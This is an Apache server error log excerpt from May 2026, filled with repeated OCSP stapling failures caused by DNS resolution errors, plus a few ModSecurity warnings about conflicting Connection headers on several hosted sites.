[Tue May 12 05:52:04.806365 2026] [security2:error] [pid 1842385:tid 1842410] [client 43.133.69.37:57968] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKj5Bs7kySIUZ3ORnItOgAAARM"]
[Tue May 12 05:52:05.061764 2026] [ssl:error] [pid 1825287:tid 1825308] (EAI 2)Name or service not known: [client 158.173.36.71:54661] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:05.061794 2026] [ssl:error] [pid 1825287:tid 1825308] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:05.411375 2026] [ssl:error] [pid 1825179:tid 1825213] (EAI 2)Name or service not known: [client 158.173.36.240:47689] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:05.411402 2026] [ssl:error] [pid 1825179:tid 1825213] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:05.812859 2026] [ssl:error] [pid 1820198:tid 1820218] (EAI 2)Name or service not known: [client 158.173.36.171:27791] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:05.812884 2026] [ssl:error] [pid 1820198:tid 1820218] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:06.160043 2026] [ssl:error] [pid 1844863:tid 1844876] (EAI 2)Name or service not known: [client 158.173.36.245:36381] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:06.160080 2026] [ssl:error] [pid 1844863:tid 1844876] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:06.503943 2026] [ssl:error] [pid 1825287:tid 1825327] (EAI 2)Name or service not known: [client 158.173.36.210:32809] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:06.503976 2026] [ssl:error] [pid 1825287:tid 1825327] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:06.858058 2026] [ssl:error] [pid 1808852:tid 1808858] (EAI 2)Name or service not known: [client 158.173.36.68:34947] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:06.858100 2026] [ssl:error] [pid 1808852:tid 1808858] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:07.245851 2026] [ssl:error] [pid 1825179:tid 1825204] (EAI 2)Name or service not known: [client 158.173.36.63:49223] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:07.245910 2026] [ssl:error] [pid 1825179:tid 1825204] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:07.712397 2026] [ssl:error] [pid 1844863:tid 1844873] (EAI 2)Name or service not known: [client 158.173.36.134:26743] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:07.712431 2026] [ssl:error] [pid 1844863:tid 1844873] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:07.808290 2026] [security2:error] [pid 1820198:tid 1820204] [client 43.133.69.37:45532] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKj581tk6y7yBJLpJo-KQAAAIQ"], referer: http://www.tchatbooster.com
[Tue May 12 05:52:08.122341 2026] [ssl:error] [pid 1842385:tid 1842414] (EAI 2)Name or service not known: [client 158.173.36.70:34881] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:08.122377 2026] [ssl:error] [pid 1842385:tid 1842414] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:08.516271 2026] [ssl:error] [pid 1820198:tid 1820217] (EAI 2)Name or service not known: [client 158.173.36.68:25295] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:08.516307 2026] [ssl:error] [pid 1820198:tid 1820217] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:09.011393 2026] [ssl:error] [pid 1844863:tid 1844887] (EAI 2)Name or service not known: [client 158.173.36.80:22061] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:09.011432 2026] [ssl:error] [pid 1844863:tid 1844887] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:09.358610 2026] [ssl:error] [pid 1808852:tid 1808856] (EAI 2)Name or service not known: [client 158.173.36.57:36427] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:09.358635 2026] [ssl:error] [pid 1808852:tid 1808856] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:09.710190 2026] [ssl:error] [pid 1820198:tid 1820200] (EAI 2)Name or service not known: [client 158.173.36.161:37673] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:09.710229 2026] [ssl:error] [pid 1820198:tid 1820200] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:10.057342 2026] [ssl:error] [pid 1842385:tid 1842393] (EAI 2)Name or service not known: [client 158.173.36.240:41403] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:10.057373 2026] [ssl:error] [pid 1842385:tid 1842393] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:10.371482 2026] [ssl:error] [pid 1825287:tid 1825314] (EAI 2)Name or service not known: [client 74.7.230.0:48928] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:52:10.371509 2026] [ssl:error] [pid 1825287:tid 1825314] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:10.410517 2026] [ssl:error] [pid 1808852:tid 1808864] (EAI 2)Name or service not known: [client 158.173.36.169:21003] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:10.410538 2026] [ssl:error] [pid 1808852:tid 1808864] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:10.764308 2026] [ssl:error] [pid 1844863:tid 1844892] (EAI 2)Name or service not known: [client 158.173.36.54:60719] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:10.764341 2026] [ssl:error] [pid 1844863:tid 1844892] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:11.155825 2026] [ssl:error] [pid 1844863:tid 1844879] (EAI 2)Name or service not known: [client 158.173.36.85:25111] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:11.155855 2026] [ssl:error] [pid 1844863:tid 1844879] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:11.552458 2026] [ssl:error] [pid 1842385:tid 1842409] (EAI 2)Name or service not known: [client 158.173.36.134:37653] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:11.552493 2026] [ssl:error] [pid 1842385:tid 1842409] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:11.686824 2026] [security2:error] [pid 1825287:tid 1825329] [client 43.157.38.131:44954] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/"] [unique_id "agKj6wgpmE1yW0glLdgzzgAAANc"], referer: http://www.apoe.fr
[Tue May 12 05:52:11.905354 2026] [ssl:error] [pid 1820198:tid 1820211] (EAI 2)Name or service not known: [client 158.173.36.134:47327] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:11.905374 2026] [ssl:error] [pid 1820198:tid 1820211] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:12.254792 2026] [ssl:error] [pid 1808852:tid 1808879] (EAI 2)Name or service not known: [client 158.173.36.210:57227] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:12.254830 2026] [ssl:error] [pid 1808852:tid 1808879] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:12.611657 2026] [ssl:error] [pid 1825179:tid 1825210] (EAI 2)Name or service not known: [client 158.173.36.160:25283] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:12.611685 2026] [ssl:error] [pid 1825179:tid 1825210] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:13.009105 2026] [ssl:error] [pid 1844863:tid 1844875] (EAI 2)Name or service not known: [client 158.173.36.210:29387] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:13.009144 2026] [ssl:error] [pid 1844863:tid 1844875] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:13.410286 2026] [ssl:error] [pid 1844863:tid 1844881] (EAI 2)Name or service not known: [client 158.173.36.124:56069] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:13.410312 2026] [ssl:error] [pid 1844863:tid 1844881] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:13.810066 2026] [ssl:error] [pid 1842385:tid 1842403] (EAI 2)Name or service not known: [client 158.173.36.45:28339] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:13.810090 2026] [ssl:error] [pid 1842385:tid 1842403] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:14.214618 2026] [ssl:error] [pid 1842385:tid 1842401] (EAI 2)Name or service not known: [client 158.173.36.70:54375] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:14.214648 2026] [ssl:error] [pid 1842385:tid 1842401] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:14.609783 2026] [ssl:error] [pid 1825287:tid 1825321] (EAI 2)Name or service not known: [client 158.173.36.29:49369] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:14.609806 2026] [ssl:error] [pid 1825287:tid 1825321] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:14.954959 2026] [ssl:error] [pid 1808852:tid 1808874] (EAI 2)Name or service not known: [client 158.173.36.31:58791] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:14.955001 2026] [ssl:error] [pid 1808852:tid 1808874] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:15.300039 2026] [ssl:error] [pid 1825179:tid 1825215] (EAI 2)Name or service not known: [client 158.173.36.217:33793] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:15.300080 2026] [ssl:error] [pid 1825179:tid 1825215] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:15.650826 2026] [ssl:error] [pid 1820198:tid 1820202] (EAI 2)Name or service not known: [client 158.173.36.12:26041] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:15.650858 2026] [ssl:error] [pid 1820198:tid 1820202] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:16.001507 2026] [ssl:error] [pid 1844863:tid 1844890] (EAI 2)Name or service not known: [client 158.173.36.161:26365] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:16.001536 2026] [ssl:error] [pid 1844863:tid 1844890] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:16.347204 2026] [ssl:error] [pid 1808852:tid 1808855] (EAI 2)Name or service not known: [client 158.173.36.85:63113] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:16.347234 2026] [ssl:error] [pid 1808852:tid 1808855] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:16.705996 2026] [ssl:error] [pid 1844863:tid 1844884] (EAI 2)Name or service not known: [client 158.173.36.164:42401] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:16.706030 2026] [ssl:error] [pid 1844863:tid 1844884] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:17.052757 2026] [ssl:error] [pid 1842385:tid 1842413] (EAI 2)Name or service not known: [client 158.173.36.169:38859] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:17.052798 2026] [ssl:error] [pid 1842385:tid 1842413] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:17.413938 2026] [ssl:error] [pid 1825287:tid 1825305] (EAI 2)Name or service not known: [client 158.173.36.31:45191] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:17.413981 2026] [ssl:error] [pid 1825287:tid 1825305] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:17.760598 2026] [ssl:error] [pid 1808852:tid 1808876] (EAI 2)Name or service not known: [client 158.173.36.68:33651] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:17.760638 2026] [ssl:error] [pid 1808852:tid 1808876] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:18.108874 2026] [ssl:error] [pid 1844863:tid 1844871] (EAI 2)Name or service not known: [client 158.173.36.45:58837] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:18.108924 2026] [ssl:error] [pid 1844863:tid 1844871] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:18.457475 2026] [ssl:error] [pid 1825287:tid 1825323] (EAI 2)Name or service not known: [client 158.173.36.164:57947] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:18.457506 2026] [ssl:error] [pid 1825287:tid 1825323] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:18.805801 2026] [ssl:error] [pid 1820198:tid 1820214] (EAI 2)Name or service not known: [client 158.173.36.63:53207] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:18.805830 2026] [ssl:error] [pid 1820198:tid 1820214] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:19.153642 2026] [ssl:error] [pid 1844863:tid 1844878] (EAI 2)Name or service not known: [client 158.173.36.164:63115] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:19.153674 2026] [ssl:error] [pid 1844863:tid 1844878] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:19.513270 2026] [ssl:error] [pid 1842385:tid 1842412] (EAI 2)Name or service not known: [client 158.173.36.164:38853] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:19.513308 2026] [ssl:error] [pid 1842385:tid 1842412] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:19.860204 2026] [ssl:error] [pid 1808852:tid 1808865] (EAI 2)Name or service not known: [client 158.173.36.49:37303] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:19.860242 2026] [ssl:error] [pid 1808852:tid 1808865] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:20.206435 2026] [ssl:error] [pid 1825179:tid 1825203] (EAI 2)Name or service not known: [client 158.173.36.4:50553] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:20.206476 2026] [ssl:error] [pid 1825179:tid 1825203] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:20.549441 2026] [ssl:error] [pid 1820198:tid 1820201] (EAI 2)Name or service not known: [client 158.173.36.12:64213] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:20.549478 2026] [ssl:error] [pid 1820198:tid 1820201] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:20.905582 2026] [ssl:error] [pid 1844863:tid 1844882] (EAI 2)Name or service not known: [client 158.173.36.4:26229] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:20.905618 2026] [ssl:error] [pid 1844863:tid 1844882] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:21.250929 2026] [ssl:error] [pid 1842385:tid 1842402] (EAI 2)Name or service not known: [client 158.173.36.12:35573] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:21.250965 2026] [ssl:error] [pid 1842385:tid 1842402] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:21.602843 2026] [ssl:error] [pid 1808852:tid 1808869] (EAI 2)Name or service not known: [client 158.173.36.54:26061] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:21.602869 2026] [ssl:error] [pid 1808852:tid 1808869] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:21.955673 2026] [ssl:error] [pid 1825179:tid 1825209] (EAI 2)Name or service not known: [client 158.173.36.71:24151] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:21.955709 2026] [ssl:error] [pid 1825179:tid 1825209] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:22.344067 2026] [ssl:error] [pid 1825287:tid 1825308] (EAI 2)Name or service not known: [client 158.173.36.57:54067] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:22.344105 2026] [ssl:error] [pid 1825287:tid 1825308] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:22.705010 2026] [ssl:error] [pid 1808852:tid 1808870] (EAI 2)Name or service not known: [client 158.173.36.245:24023] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:22.705046 2026] [ssl:error] [pid 1808852:tid 1808870] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:23.109221 2026] [ssl:error] [pid 1825287:tid 1825327] (EAI 2)Name or service not known: [client 158.173.36.63:42543] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:23.109249 2026] [ssl:error] [pid 1825287:tid 1825327] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:23.520882 2026] [ssl:error] [pid 1820198:tid 1820217] (EAI 2)Name or service not known: [client 158.173.36.134:49429] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:23.520933 2026] [ssl:error] [pid 1820198:tid 1820217] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:23.903696 2026] [ssl:error] [pid 1844863:tid 1844876] (EAI 2)Name or service not known: [client 158.173.36.169:29107] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:23.903719 2026] [ssl:error] [pid 1844863:tid 1844876] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:24.308071 2026] [ssl:error] [pid 1842385:tid 1842414] (EAI 2)Name or service not known: [client 158.173.36.164:52657] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:24.308098 2026] [ssl:error] [pid 1842385:tid 1842414] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:24.708571 2026] [ssl:error] [pid 1825179:tid 1825204] (EAI 2)Name or service not known: [client 158.173.36.164:59043] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:24.708610 2026] [ssl:error] [pid 1825179:tid 1825204] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:25.117354 2026] [ssl:error] [pid 1820198:tid 1820204] (EAI 2)Name or service not known: [client 158.173.36.164:26829] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:25.117381 2026] [ssl:error] [pid 1820198:tid 1820204] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:25.513920 2026] [ssl:error] [pid 1844863:tid 1844873] (EAI 2)Name or service not known: [client 158.173.36.161:55677] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:25.513963 2026] [ssl:error] [pid 1844863:tid 1844873] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:25.864700 2026] [ssl:error] [pid 1842385:tid 1842395] (EAI 2)Name or service not known: [client 158.173.36.171:63949] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:25.864726 2026] [ssl:error] [pid 1842385:tid 1842395] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:26.248484 2026] [ssl:error] [pid 1808852:tid 1808857] (EAI 2)Name or service not known: [client 158.173.36.31:34867] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:26.248521 2026] [ssl:error] [pid 1808852:tid 1808857] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:26.602473 2026] [ssl:error] [pid 1844863:tid 1844887] (EAI 2)Name or service not known: [client 158.173.36.169:44179] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:26.602511 2026] [ssl:error] [pid 1844863:tid 1844887] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:26.951150 2026] [ssl:error] [pid 1842385:tid 1842393] (EAI 2)Name or service not known: [client 158.173.36.57:41201] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:26.951187 2026] [ssl:error] [pid 1842385:tid 1842393] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:27.305448 2026] [ssl:error] [pid 1825287:tid 1825314] (EAI 2)Name or service not known: [client 158.173.36.54:59397] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:27.305486 2026] [ssl:error] [pid 1825287:tid 1825314] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:27.653221 2026] [ssl:error] [pid 1825179:tid 1825217] (EAI 2)Name or service not known: [client 158.173.36.210:46899] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:27.653257 2026] [ssl:error] [pid 1825179:tid 1825217] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:28.014394 2026] [ssl:error] [pid 1820198:tid 1820206] (EAI 2)Name or service not known: [client 158.173.36.134:62317] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:28.014435 2026] [ssl:error] [pid 1820198:tid 1820206] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:28.362849 2026] [ssl:error] [pid 1844863:tid 1844883] (EAI 2)Name or service not known: [client 158.173.36.169:26003] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:28.362876 2026] [ssl:error] [pid 1844863:tid 1844883] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:28.703807 2026] [ssl:error] [pid 1842385:tid 1842409] (EAI 2)Name or service not known: [client 158.173.36.134:57855] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:28.703834 2026] [ssl:error] [pid 1842385:tid 1842409] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:29.108735 2026] [ssl:error] [pid 1808852:tid 1808864] (EAI 2)Name or service not known: [client 158.173.36.230:53063] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:29.108766 2026] [ssl:error] [pid 1808852:tid 1808864] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:29.458770 2026] [ssl:error] [pid 1825179:tid 1825214] (EAI 2)Name or service not known: [client 158.173.36.240:50025] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:29.458812 2026] [ssl:error] [pid 1825179:tid 1825214] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:29.813622 2026] [ssl:error] [pid 1820198:tid 1820215] (EAI 2)Name or service not known: [client 158.173.36.240:28957] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:29.813659 2026] [ssl:error] [pid 1820198:tid 1820215] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:30.166860 2026] [ssl:error] [pid 1844863:tid 1844892] (EAI 2)Name or service not known: [client 158.173.36.245:62011] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:30.166929 2026] [ssl:error] [pid 1844863:tid 1844892] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:30.520782 2026] [ssl:error] [pid 1825287:tid 1825310] (EAI 2)Name or service not known: [client 158.173.36.217:48495] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:30.520809 2026] [ssl:error] [pid 1825287:tid 1825310] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:30.867109 2026] [ssl:error] [pid 1808852:tid 1808862] (EAI 2)Name or service not known: [client 158.173.36.80:58057] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:30.867141 2026] [ssl:error] [pid 1808852:tid 1808862] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:31.315879 2026] [ssl:error] [pid 1820198:tid 1820211] (EAI 2)Name or service not known: [client 158.173.36.63:44355] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:31.315928 2026] [ssl:error] [pid 1820198:tid 1820211] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:31.701784 2026] [ssl:error] [pid 1825287:tid 1825309] (EAI 2)Name or service not known: [client 158.173.36.85:47181] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:31.701816 2026] [ssl:error] [pid 1825287:tid 1825309] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:32.204072 2026] [ssl:error] [pid 1825179:tid 1825212] (EAI 2)Name or service not known: [client 158.173.36.169:23855] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:32.204110 2026] [ssl:error] [pid 1825179:tid 1825212] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:32.559972 2026] [ssl:error] [pid 1820198:tid 1820223] (EAI 2)Name or service not known: [client 158.173.36.241:31453] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:32.560009 2026] [ssl:error] [pid 1820198:tid 1820223] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:32.908730 2026] [ssl:error] [pid 1825287:tid 1825326] (EAI 2)Name or service not known: [client 158.173.36.245:54893] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:32.908764 2026] [ssl:error] [pid 1825287:tid 1825326] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:33.252869 2026] [ssl:error] [pid 1808852:tid 1808873] (EAI 2)Name or service not known: [client 158.173.36.57:41031] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:33.252921 2026] [ssl:error] [pid 1808852:tid 1808873] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:33.600465 2026] [ssl:error] [pid 1842385:tid 1842397] (EAI 2)Name or service not known: [client 158.173.36.134:56903] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:33.600501 2026] [ssl:error] [pid 1842385:tid 1842397] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:33.949618 2026] [ssl:error] [pid 1825287:tid 1825307] (EAI 2)Name or service not known: [client 158.173.36.71:62535] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:33.949652 2026] [ssl:error] [pid 1825287:tid 1825307] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:34.307669 2026] [ssl:error] [pid 1820198:tid 1820207] (EAI 2)Name or service not known: [client 158.173.36.217:37749] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:34.307699 2026] [ssl:error] [pid 1820198:tid 1820207] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:34.348886 2026] [security2:error] [pid 1808852:tid 1808863] [client 129.226.146.42:39926] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/about/"] [unique_id "agKkAhfeipD4uoG21Fo4zwAAAAg"]
[Tue May 12 05:52:34.651370 2026] [ssl:error] [pid 1844863:tid 1844875] (EAI 2)Name or service not known: [client 158.173.36.4:26433] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:34.651417 2026] [ssl:error] [pid 1844863:tid 1844875] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:35.007903 2026] [ssl:error] [pid 1808852:tid 1808868] (EAI 2)Name or service not known: [client 158.173.36.29:45781] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:35.007930 2026] [ssl:error] [pid 1808852:tid 1808868] AH01941: stapling_renew_response: responder error
